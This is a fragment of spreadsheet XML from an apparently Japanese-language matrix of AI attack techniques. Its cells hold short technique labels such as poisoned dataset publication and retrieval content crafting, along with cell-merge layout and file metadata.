        <v>幻覚化されたエンティティの公開</v>
      </c>
      <c r="T12" s="2" t="str">
        <f>'techniques (ja)'!C140</f>
        <v>攻撃の検証</v>
      </c>
      <c r="Y12" s="2" t="str">
        <f>'techniques (ja)'!C121</f>
        <v>AI システムに対するチャフ データを使用したスパム攻撃</v>
      </c>
    </row>
    <row r="13" spans="1:26" ht="27" x14ac:dyDescent="0.2">
      <c r="C13" s="2" t="str">
        <f>'techniques (ja)'!C105</f>
        <v>汚染済みデータセットの公開</v>
      </c>
    </row>
    <row r="14" spans="1:26" x14ac:dyDescent="0.2">
      <c r="C14" s="2" t="str">
        <f>'techniques (ja)'!C106</f>
        <v>汚染済みモデルの公開</v>
      </c>
    </row>
    <row r="15" spans="1:26" x14ac:dyDescent="0.2">
      <c r="C15" s="2" t="str">
        <f>'techniques (ja)'!C111</f>
        <v>検索コンテンツの作成</v>
      </c>
    </row>
    <row r="16" spans="1:26" x14ac:dyDescent="0.2">
      <c r="C16" s="2" t="str">
        <f>'techniques (ja)'!C124</f>
        <v>機能のステージング</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="25">
    <mergeCell ref="T2:T6"/>
    <mergeCell ref="T7:T9"/>
    <mergeCell ref="T10:T11"/>
    <mergeCell ref="W2:W4"/>
    <mergeCell ref="Y7:Y11"/>
    <mergeCell ref="H4:H5"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="M4:M6"/>
    <mergeCell ref="P7:P8"/>
    <mergeCell ref="P9:P11"/>
    <mergeCell ref="A6:A8"/>
    <mergeCell ref="C2:C3"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="C9:C10"/>
    <mergeCell ref="E2:E5"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="P1:Q1"/>
    <mergeCell ref="T1:U1"/>
    <mergeCell ref="W1:X1"/>
    <mergeCell ref="Y1:Z1"/>
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="C1:D1"/>
    <mergeCell ref="E1:F1"/>
    <mergeCell ref="H1:I1"/>
    <mergeCell ref="J1:K1"/>
  </mergeCells>
  <phoneticPr fontId="1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techniques (ja)</vt:lpstr>
      <vt:lpstr>tactics (ja)</vt:lpstr>
      <vt:lpstr>mitigations (ja)</vt:lpstr>
      <vt:lpstr>matrix (ja)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大輔 今川</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T22:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-03T14:28:31Z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DDFA02BBFF8A4847B8AA75449B891D36</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1041-11.2.0.10707</vt:lpwstr>
  </property>
</Properties>
</file>